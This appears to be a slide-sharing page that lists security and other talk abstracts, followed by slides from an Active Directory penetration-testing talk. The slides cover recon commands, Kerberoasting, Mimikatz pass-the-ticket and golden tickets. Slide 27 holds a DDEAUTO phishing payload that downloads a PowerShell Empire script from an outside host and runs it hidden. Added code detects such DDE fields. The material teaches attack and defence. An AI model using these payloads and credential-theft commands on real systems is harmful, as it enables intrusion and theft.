Introduction to penetration testing in Microsoft Active Directory environments, delivered as a practical talk for auditors and anyone interested in pentesting corporate environments. It opens with a brief introduction to the Active Directory directory service and the components that matter most from a security standpoint. It then explains the main differences from a classic infrastructure pentest, together with the most common techniques and attacks used to carry out the exercise and fully compromise the corporate domain. Requirements: attendees are expected to have basic knowledge of Active Directory and basic-to-intermediate knowledge of pentesting or ethical hacking, preferably in infrastructure and/or operating systems.
FreeIPA is the open source answer to Active Directory, bringing the functionality of Kerberos and centralized management to the unix world. This talk will dive into the background of FreeIPA, how to attack it, and its parallels to traditional Active Directory. We will cover the FreeIPA equivalents of credential abuse, discovery, and lateral movement, highlighting the similarities and differences from traditional Active Directory tradecraft. This will culminate in multiple real-world demos showing how chains of abuse, previously accessible only in Windows environments, are now possible in the unix realm, providing a new medium for offensive research into Kerberos and LDAP environments.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
This presentation gives an introduction to the MITRE ATT&CK Framework, its different use cases, and the pitfalls to watch out for. The talk was delivered at the Null Bangalore and OWASP Bangalore chapters on 15th February 2019.
Fantastic Red Team Attacks and How to Find Them - Ross Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example is Trusted Developer Utilities, which can be readily available on standard user endpoints, not just developer workstations, and which allow code execution. XSL Script processing can also be used as an attack vector, as a number of trusted utilities can consume and execute scripts via XSL. Finally, trusted .NET default binaries are known to allow unauthorized execution as well; these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and a lack of understanding of environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
PSConfEU - Offensive Active Directory (With PowerShell!) - Will Schroeder
This talk covers PowerShell for offensive Active Directory operations with PowerView. It was given on April 21, 2016 at the PowerShell Conference EU 2016.
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di... - Dirkjan Mollema
Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges.
While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory.
This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will take a dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained) and what permissions are associated with these accounts.
The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets.
We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups.
Lastly, we will look at how to prevent these kinds of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure.
Every IR presents unique challenges. But - when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly-evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day - the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it.
Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear)
Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attack paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.
In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.
Hunting for APT in network logs workshop presentation - OlehLevytskyi1
Nonamecon 2021 presentation.
Network logs are one of the most efficient sources for hunting adversaries, but building good analytics capabilities requires a deep understanding of benign activity and attacker behavior. This training focuses on detecting real-case attacks, tools and scenarios from the past year.
The training is highly interactive and retains a good balance between theory and a lot of hands-on exercises for the students to get used to the detection engineering methodology and prepare them to start implementing this at their organizations.
Presentation topics:
- Netflow Mitre Matrix view
- Full packet captures vs Netflow
- Zeek
- Zeek packages
- RDP initial compromise
- Empire PowerShell and Cobalt Strike, or what to expect after initial loader execution
- Empire PowerShell initial connection
- Beaconing and RITA
- Scanning detection
- Internal enumeration detection
- Lateral movement techniques widely used
- Kerberos attacks
- PSExec and fileless ways of delivering payloads in the network
- Zerologon detection
- Data exfiltration
- Data exfiltration over C2 channel
- Data exfiltration using time size limits (data chunks)
- DNS exfiltration
- Detecting ransomware in your network
- Real incident investigation
Authors:
Oleh Levytskyi (https://twitter.com/LeOleg97)
Bogdan Vennyk (https://twitter.com/bogdanvennyk)
Red vs Blue - Modern Active Directory Attacks, Detection & Protection by Sean M... - Shakacon
While Kerberos "Golden Tickets" and "Silver Tickets" received a lot of press in the second half of 2014, there hasn't been much detail provided on how exactly they work, why they are successful, and how to mitigate them (other than: "don't get pwned"). Golden Tickets are the ultimate method for persistent, forever AD admin rights to a network since they are valid Kerberos tickets and can't be detected, right?
This talk covers the latest Active Directory attack vectors and describes how to detect Golden Ticket usage. Provided are key indicators that can detect Kerberos attacks on your network, including Golden tickets, Silver tickets & MS14-068 exploitation, as well as methods to identify, mitigate, and prevent common Active Directory attack vectors. When forged Kerberos tickets are used in AD, there are some interesting artifacts that can be identified. Yes, despite what you may have read on the internet, there are ways to detect Golden & Silver Ticket usage!
Some of the topics covered:
How attackers go from zero to (Domain) Admin
MS14-068: the vulnerability, the exploit, and the danger
"SPN Scanning" with PowerShell to identify potential targets without network scans (SQL, Exchange, FIM, webservers, etc.)
Exploiting weak service account passwords as a regular AD user
Mimikatz, the attacker's multi-tool
Using Silver Tickets for stealthy persistence that won’t be detected (until now)
Identifying forged Kerberos tickets (Golden & Silver Tickets) on your network
Detecting offensive PowerShell tools like Invoke-Mimikatz
Active Directory attack mitigation
Kerberos expertise is not required, since the presentation covers how Active Directory leverages Kerberos for authentication, identifying the areas useful for attack. The information presented is useful for both Red Team and Blue Team members as well as AD administrators.
Polyglot payloads in practice by avlidienbrunn at HackPra - Mathias Karlsson
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads cannot.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
Practical Red Teaming is a hands-on class designed to teach participants various techniques and tools for performing red teaming attacks. The goal of the training is to give a red teamer's perspective to participants who want to go beyond VAPT. This intense course immerses students in a simulated enterprise environment with multiple domains and up-to-date, patched operating systems. We will cover several phases of a Red Team engagement in depth: Local Privilege Escalation, Domain Enumeration, Admin Recon, Lateral Movement, Domain Admin privileges, etc.
If you want to learn how to perform Red Team operations, sharpen your red teaming skillset, or understand how to defend against modern attacks, Practical Red Teaming is the course for you.
Topics :
• Red Team philosophy/overview
• Red Teaming vs Penetration Testing
• Active Directory Fundamentals – Forests, Domains, OU’s etc
• Assume Breach Methodology
• Insider Attack Simulation
• Introduction to PowerShell
• Initial access methods
• Privilege escalation methods through abuse of misconfigurations
• Domain Enumeration
• Lateral Movement and Pivoting
• Single sign-on in Active Directory
• Abusing built-in functionality for code execution
• Credential Replay
• Domain privileges abuse
• Dumping System and Domain Secrets
• Kerberos – Basics and its Fundamentals
• Kerberos Attack and Defense (Kerberoasting, Silver ticket, Golden ticket attack etc)
https://bsidessg.org/schedule/2019-ajaychoudhary-and-niteshmalviya/
Demystifying SharePoint Infrastructure – for NON-IT People - SPC Adriatics
This talk is specifically not for SharePoint infrastructure administrators (though new ones still figuring things out are welcome)! Instead, it is for the rest of the SharePoint team: come learn about the basic building blocks of SharePoint infrastructure, such as DNS, load balancing, AD, high availability and disaster recovery, backup options, database options, and some of the core components of Windows, explained in an understandable way so you can speak the lingo and seem really smart!
Zvonimir Mavretić
Cisco TrustSec & Security Group Tagging - Cisco Canada
This presentation covers the protocols and functions that create a trusted network. We will discuss best practices when deploying this tagging ability using campus switches, including migration techniques from non-SGT-capable devices to a fully SGT-capable network deployment. For more information please visit our website here: http://www.cisco.com/web/CA/index.html
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
Every admin tool is an attack tool, yet there are no good or bad shells - that part is up to you. Drawing on dozens of engagements consulting on various role-based remote operations architectures and Red Team assessments for organizations on 4 continents, plus fresh research on hijacking full tokens from network logon-type sessions, we'll dive into a technical, hands-on set of examples for both Offensive and Defensive teams of what SUCKS and what ROCKS in Windows 'Living off the land' remote admin operations, protocols, and APIs. We'll talk about the pros and cons of jump server architectures, as well as role-based shells and limiting PowerShell in creative ways. We'll also introduce fresh research to achieve full token hijack from network logon-type sessions, without any hash and/or TGT!
New Approaches for Fraud Detection on Apache Kafka and KSQL - confluent
Speakers: Dale Kim, Sr. Director, Products/Solutions, Arcadia Data + Chong Yan, Solutions Architect, Confluent
When it comes to corporate fraud, early detection is integral to mitigating and preventing drastic damage.
Modern streaming data technologies like Apache Kafka® and Confluent KSQL, the streaming SQL engine for Apache Kafka, can help companies catch and detect fraud in real time instead of after the fact. Kafka is ideal for managing fast, incoming data points, and KSQL provides the de facto standard for reading that data. Combine this with Arcadia Data visualizations designed for modern data types, and you have a powerful foundation for combating fraud.
You will learn:
-Why traditional batch-driven approaches to fraud detection are insufficient today
-Why Apache Kafka is widely used for real-time fraud detection
-How KSQL and real-time visualizations open more opportunities for searching for fraud
Presentation of a few mechanisms that can help to automate the bootstrap process in an IoT environment.
This is the summary of my work done during an 8-week internship at Red Hat.
TechWiseTV Workshop: Cisco Stealthwatch and ISE - Robb Boyd
Replay the live event: http://cs.co/90008z2Ar
Learn how your existing Cisco network can help you to know exactly who is doing what on the network with end-to-end visibility, differentiate anomalies from normal behavior with contextual threat intelligence and stop threats and mitigate risk with one-click containment of users and devices.
It’s time for the network to protect itself. Please make time for this important workshop.
Resources:
Watch the Cisco Stealthwatch and ISE full episode: http://cs.co/90008z24M
Network as a Sensor-Enforcer on CCO:
http://www.cisco.com/c/en/us/solutions/enterprise-networks/enterprise-network-security/net-sensor.html
Cisco ISE Community
http://cs.co/ise-community
Cloud Platform Symantec Meetup Nov 2014 - Miguel Zuniga
Openstack Lessons learned
Continuous Integration and Deployment using Openstack
Tuning Openstack for High Availability and Performance in Large Production Deployments
Epistemic Interaction - tuning interfaces to provide information for AI support - Alan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Pushing the limits of ePRTC: 100ns holdover for 100 days - Adtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
State of ICS and IoT Cyber Threat Landscape Report 2024 preview - Prayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
2. WHOAMI: Carlos García García (ciyinet)
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author of the book "Hacking Windows: Ataques a sistemas y redes Microsoft"
Pentesting Active Directory
3. WHAT ARE WE GOING TO TALK ABOUT?
- Introduction to Active Directory
- Authentication Protocols
- Active Directory Penetration Testing
- Reconnaissance
- Common Attacks & Techniques
- Lateral and Vertical Movements
- How-to Avoid Being Caught
4. BEAR IN MIND
- AD-related techniques
- I learn Active Directory from the offensive side
- We lower risks and not the other way around
- This is going to be intense
6. ACTIVE DIRECTORY 101
• AD is Microsoft's answer to directory services
• A directory service is a hierarchical structure that stores objects for quick access and management of all resources
7. ACTIVE DIRECTORY 101
• Uses LDAP as its access protocol
• Relies on DNS as its locator service, enabling clients to locate domain controllers through DNS queries
• AD supports several naming conventions:
  • User Principal Names (UPN): user@domain
  • LDAP names (Distinguished Names): cn=common name, ou=organizational unit, dc=domain component
    • e.g. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON
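Added example (not from the deck): a small parser for the two naming conventions on this slide. It splits an RFC 4514 Distinguished Name into its components, honours backslash-escaped commas, and derives the DNS domain and a UPN from the dc= chain. The input DN is the slide's own example; the assumption that the leading cn is the account name and that the UPN suffix equals the DNS domain is this example's, not the deck's.

```python
"""Parser for the two AD naming conventions on this slide: LDAP Distinguished
Names (RFC 4514) and User Principal Names. Added example; input is constructed."""
from typing import List, Tuple


def parse_dn(dn: str) -> List[Tuple[str, str]]:
    """Split a DN into (attribute type, value) pairs.

    A backslash escapes the next character, so 'cn=Smith\\, John' keeps its
    comma. Attribute types are lower-cased; surrounding whitespace is dropped
    because the slide writes 'cn=ciyi, ou=Madrid' with spaces after the commas.
    """
    rdns, buf, i = [], [], 0
    while i < len(dn):
        ch = dn[i]
        if ch == "\\" and i + 1 < len(dn):      # escaped character: take it literally
            buf.append(dn[i + 1])
            i += 2
            continue
        if ch == ",":                           # unescaped comma ends the RDN
            rdns.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    rdns.append("".join(buf))

    pairs = []
    for rdn in rdns:
        if "=" not in rdn:
            raise ValueError(f"malformed RDN: {rdn!r}")
        attr, value = rdn.split("=", 1)
        pairs.append((attr.strip().lower(), value.strip()))
    return pairs


def dn_domain(pairs: List[Tuple[str, str]]) -> str:
    """Join the dc= components into the DNS domain name (dc=Rooted,dc=CON -> Rooted.CON)."""
    return ".".join(v for t, v in pairs if t == "dc")


def dn_to_upn(pairs: List[Tuple[str, str]]) -> str:
    """Build user@domain from the first cn= and the dc= chain.

    Assumption for this example: the leading cn is the account name and the
    UPN suffix equals the DNS domain; real directories can differ on both.
    """
    cn = next((v for t, v in pairs if t == "cn"), None)
    if cn is None:
        raise ValueError("DN has no cn component")
    return f"{cn}@{dn_domain(pairs)}"


if __name__ == "__main__":
    example = "cn=ciyi, ou=Madrid, dc=Rooted, dc=CON"   # the slide's example DN
    print(parse_dn(example))
    print(dn_to_upn(parse_dn(example)))
```

The escape handling matters in practice: a user whose cn contains a comma (cn=Smith\, John) would otherwise be split into two bogus RDNs, which is a common source of wrong group or OU lookups in scripts that string-split DNs.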
12. NTLM SCHEME
Protocol   Algorithm   Secret to use
LM         DES-ECB     LM hash
NTLMv1     DES-ECB     NT hash
NTLMv2     HMAC-MD5    NT hash
14. KERBEROS SCHEME
1. Client encrypts a timestamp with his/her hash/key
2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are
3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain
4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN)

Protocol   Secret to use
Kerberos   RC4 = NT hash / AES128 key / AES256 key
27. PHISHING + DDEAUTO = RCE
• Dynamic Data Exchange (DDE): protocol for transferring data between applications
• Valid for MS Excel, MS Word... and MS Outlook
• Recently used as macro-less malware
DDEAUTO "C:\Programs\Microsoft\Office\365\Outlook\..\..\..\..\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-test.ps1');powershell -e $e # " "Beneficios Qurtuba"
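Added example from the defender's side (not part of the deck): a scanner that pulls every field code out of a Word document's XML and flags the ones starting with DDE or DDEAUTO. It handles the common trick of splitting the field across several `w:instrText` runs, which defeats a plain string search for "DDEAUTO". The sample XML is constructed with a harmless calc lure; the `scan_docx` helper assumes the usual OOXML layout (parts under `word/`).

```python
"""Detect DDE/DDEAUTO field codes in WordprocessingML. Added example; the
document XML below is constructed, not taken from a real lure."""
import re
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List, Union

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
DDE_FIELD = re.compile(r"^\s*(DDE|DDEAUTO)\b", re.IGNORECASE)

# Constructed sample: one DDEAUTO field split over two runs (evasion), plus a
# benign DATE field that must not be reported.
SAMPLE_DOCUMENT_XML = r"""<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body>
 <w:p>
  <w:r><w:fldChar w:fldCharType="begin"/></w:r>
  <w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>
  <w:r><w:instrText xml:space="preserve">AUTO cmd.exe "/c calc" </w:instrText></w:r>
  <w:r><w:fldChar w:fldCharType="separate"/></w:r>
  <w:r><w:t>Beneficios Qurtuba</w:t></w:r>
  <w:r><w:fldChar w:fldCharType="end"/></w:r>
 </w:p>
 <w:p><w:fldSimple w:instr=" DATE \@ &quot;d/M/yyyy&quot; "><w:r><w:t>2/3/2018</w:t></w:r></w:fldSimple></w:p>
</w:body>
</w:document>"""


def extract_field_codes(document_xml: Union[str, bytes]) -> List[str]:
    """Return every field instruction in document order, whitespace-normalised.

    Both encodings of a field are covered: the compact <w:fldSimple w:instr=..>
    form and the begin/instrText.../end run sequence, whose instrText chunks
    are concatenated so a field split across runs is reassembled.
    """
    root = ET.fromstring(document_xml)
    codes, depth, buf = [], 0, []
    for el in root.iter():
        if el.tag == W + "fldSimple":
            codes.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
                if depth == 1:
                    buf = []
            elif kind == "end":
                depth -= 1
                if depth == 0:
                    codes.append("".join(buf))
        elif el.tag == W + "instrText" and depth > 0:
            buf.append(el.text or "")      # nested fields are flattened into the outer code
    return [" ".join(c.split()) for c in codes]


def find_dde_fields(document_xml: Union[str, bytes]) -> List[str]:
    """Field codes that invoke DDE, i.e. the DDEAUTO lure from the slide."""
    return [c for c in extract_field_codes(document_xml) if DDE_FIELD.match(c)]


def scan_docx(path: str) -> Dict[str, List[str]]:
    """Scan every XML part under word/ (body, headers, footers) of a .docx file."""
    hits = {}
    with zipfile.ZipFile(path) as z:
        for name in z.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                found = find_dde_fields(z.read(name))
                if found:
                    hits[name] = found
    return hits


if __name__ == "__main__":
    print(find_dde_fields(SAMPLE_DOCUMENT_XML))
```

One caveat worth knowing before relying on this: field codes can be wrapped in a QUOTE field that spells the instruction as character codes, so a production scanner should also resolve QUOTE fields before matching; and Office's mitigation of disabling DDE via the registry does not change the document, so scanning mail attachments at the gateway complements it rather than replacing it.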
31. LOCAL RECONNAISSANCE
Collect information about the network, processes and OS in order to find out what kind of machine we succeeded in infecting.
Command: Description
ipconfig /all
    Displays the IP address, subnet mask, and default gateway for all adapters, plus DHCP and DNS settings
whoami /all
    Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to
net localgroup
    Displays the name of the server and the names of local groups on the computer
net localgroup "administrators"
    Displays local administrators
netstat -an
    Displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table
tasklist /V
    Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer
32. LOCAL RECONNAISSANCE
Collect information about the network, processes and OS in order to find out what kind of machine we succeeded in infecting.
Command: Description
net start
    Lists started Windows services
sc qc <SERVICE>
    Gets the parameters for an individual service
accesschk.exe -ucqv <SERVICE>
    Determines service access control rules (accesschk.exe is part of the Microsoft Sysinternals suite)
systeminfo > info_output.txt
    Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards
schtasks /query /fo LIST /v
    Lists scheduled tasks: whether they are recurring, where the task can be found and its parameters, as well as, crucially, what permissions they are run with
dir, type, findstr
    Browse and search for information in the local file system
33. NETWORK RECONNAISSANCE
Collect information about the network, processes and OS in order to find out what kind of machine we succeeded in infecting.
Command: Description
ping ☺
echo %USERDOMAIN%
    Domain name which the host is joined to
echo %logonserver% (or: set logonserver)
    Obtains the name of the Domain Controller the host used to authenticate to
net group /domain
    Lists existing groups in the domain
net group <GROUP NAME> /domain
    Lists members of a group, e.g. "domain computers", "domain controllers", "domain admins"
net localgroup administrators /domain
    Gets members of the built-in group "Administrators"
34. NETWORK RECONNAISSANCE
Collect information about the network, processes and OS in order to find out what kind of machine we succeeded in infecting.
Command: Description
net user /domain
    Lists all users within the current domain
net user <ACCOUNT NAME> /domain
    Obtains detailed information about a user given his username
net view
    Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain
net use
    Access to shared resources
net accounts /domain
    Obtains the domain password policy
nltest /domain_trusts
    Maps trust relationships
37. COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%
• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%
• SMB Shares Mining – 75%
• Credential Theft Shuffle ("Mimikatz dance") – 60%
Reference: https://adsecurity.org/?p=2362
39. KERBEROAST
Diagram: the Kerberos scheme from slide 14 (steps 1 to 4, client, TGT, TGS and the service's SPN hash), with an attacker added.
40. KERBEROAST
• Offline brute force of the password of the service account within service tickets (TGS)
• No risk of detection
• No account lockouts
• Invoke-Kerberoast from PowerView (dev) to collect hashes
• Focus on user accounts. They have shorter passwords
• JohnTheRipper (magnumripper) to crack them
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper
41. SMB SHARES MINING
• Usually very fruitful, but sometimes boring and time consuming
• Enumerating shares in the environment and looking for data with hardcoded creds (scripts, config files), backups, documentation...
PowerView Find-DomainShare
• Searches for computer shares on the domain. If -CheckShareAccess is passed, then only shares the current user has read access to are returned.
smbmap
• Intended to simplify searching for potentially sensitive data across large networks.
• Enumerates samba share drives across an entire domain. Lists drives, permissions, contents, upload/download functionality, file name auto-download pattern matching, etc.
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/ShawnDEvans/smbmap
43. CREDENTIAL THEFT SHUFFLE ("Mimikatz dance")
• Escalating privileges on some machine
• Extracting creds/hashes from memory
• Derivative administrator
• User hunting: moving laterally and repeating the attack till Domain Admin level is reached
Reference:
https://github.com/gentilkiwi/mimikatz
47. USER HUNTING
• Invoke-UserHunter (PowerView)
• BloodHound
1. Gets groups and group members of each group
2. Lists domain computers
3. Obtains local admins for each computer
4. Lists active sessions on each computer
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/BloodHoundAD/BloodHound
56. PASS-THE-TICKET
• Inject Kerberos tickets
• Tickets must be in Kerberos credential format (KRB_CRED): http://tools.ietf.org/html/rfc4120#section-5.8
• The Kerberos module does not require any privilege. It uses the official Microsoft Kerberos API
mimikatz.exe "kerberos::ptt FILENAME"
57. GOLDEN TICKET
Diagram: the attacker, holding the krbtgt hash, forges a TGT (username, group membership, ...) encrypted with the KRBTGT hash.
58. GOLDEN TICKET
The KRBTGT hash can be used to generate an arbitrary TGT:
• Made by the attacker, not the KDC
• Anything can be pushed inside
